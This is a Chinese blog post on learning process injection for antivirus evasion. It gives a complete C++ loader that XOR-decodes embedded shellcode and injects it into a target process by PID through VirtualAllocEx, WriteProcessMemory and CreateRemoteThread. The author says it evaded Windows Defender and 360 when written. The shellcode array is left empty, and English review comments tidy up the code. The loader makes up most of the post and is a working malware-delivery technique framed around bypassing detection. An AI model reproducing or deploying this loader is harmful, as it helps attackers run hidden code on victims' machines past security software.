进程注入免杀学习

进程注入免杀学习

下面是自写的进程注入代码，已对主要代码加注释，相关函数如有不懂请查阅官方文档。撰文时在 Windows Defender、360 下全程免杀；此类结果依赖当时的特征库与行为规则，随更新会失效，仅供参考。

案例

#include <cstdio>
#include <cstdlib>
#include <iostream>
#include <windows.h>

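// Allocate an executable buffer in `process`, copy `length` bytes of `payload`
// into it and start a thread at its first byte.
// Returns true when the remote thread was created. On failure the Win32 error
// is printed and the remote allocation is released; on success the allocation
// is intentionally left mapped, because the new thread is executing from it.
static bool injectPayload(HANDLE process, const unsigned char* payload, SIZE_T length)
{
	// NOTE(review): a single RWX region is kept from the original listing.
	// Writable+executable private memory is a common detection heuristic;
	// W^X hygiene would allocate PAGE_READWRITE, write, then switch the page to
	// PAGE_EXECUTE_READ with VirtualProtectEx. Left as-is to preserve behaviour.
	PVOID remoteBuffer = VirtualAllocEx(process, NULL, length,
	                                    MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if (remoteBuffer == NULL) {
		fprintf(stderr, "VirtualAllocEx failed: %lu\n", GetLastError());
		return false;
	}

	// A short write would leave the thread executing a partial payload, so the
	// byte count is checked as well as the return value.
	SIZE_T written = 0;
	if (!WriteProcessMemory(process, remoteBuffer, payload, length, &written) || written != length) {
		fprintf(stderr, "WriteProcessMemory failed: %lu\n", GetLastError());
		VirtualFreeEx(process, remoteBuffer, 0, MEM_RELEASE);
		return false;
	}

	HANDLE remoteThread = CreateRemoteThread(process, NULL, 0,
	                                         (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
	if (remoteThread == NULL) {
		fprintf(stderr, "CreateRemoteThread failed: %lu\n", GetLastError());
		VirtualFreeEx(process, remoteBuffer, 0, MEM_RELEASE);
		return false;
	}

	// The original listing leaked this handle; closing it does not affect the
	// running thread.
	CloseHandle(remoteThread);
	return true;
}

// Entry point: decode the embedded XOR-encoded payload and inject it into the
// process whose PID is argv[1].
// Returns 0 on success, 1 on bad arguments or on any failed Win32 call.
int main(int argc, char* argv[])
{
	// Payload bytes, stored XOR-encoded with XOR_KEY and decoded in place
	// below. Empty in this listing; the author's encoded bytes go here.
	static const unsigned char XOR_KEY = 10;
	unsigned char shellcode[] = "";

	if (argc < 2) {
		fprintf(stderr, "usage: %s <pid>\n", argv[0]);
		return 1;
	}

	// strtoul instead of atoi so a non-numeric PID is rejected instead of
	// silently becoming 0 (which OpenProcess would then fail on with a less
	// helpful error).
	char* end = NULL;
	unsigned long pidValue = strtoul(argv[1], &end, 10);
	if (end == argv[1] || *end != '\0' || pidValue == 0) {
		fprintf(stderr, "invalid pid: %s\n", argv[1]);
		return 1;
	}
	DWORD pid = static_cast<DWORD>(pidValue);

	// Decode in place. The original loop used `<=` and wrote one byte past the
	// end of the array; `<` stays in bounds. sizeof includes the literal's
	// trailing NUL, which is decoded and injected too, exactly as before.
	for (size_t i = 0; i < sizeof(shellcode); i++) {
		shellcode[i] ^= XOR_KEY;
	}

	printf("Injecting to PID: %lu\n", pidValue);

	// Request only the rights the calls in injectPayload need rather than
	// PROCESS_ALL_ACCESS (least privilege, and one fewer reason for the open
	// to be denied).
	HANDLE processHandle = OpenProcess(
		PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
		PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ,
		FALSE, pid);
	if (processHandle == NULL) {
		fprintf(stderr, "OpenProcess failed: %lu\n", GetLastError());
		return 1;
	}

	bool ok = injectPayload(processHandle, shellcode, sizeof shellcode);
	CloseHandle(processHandle);
	return ok ? 0 : 1;
}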
原文地址:https://www.cnblogs.com/Secde0/p/14177390.html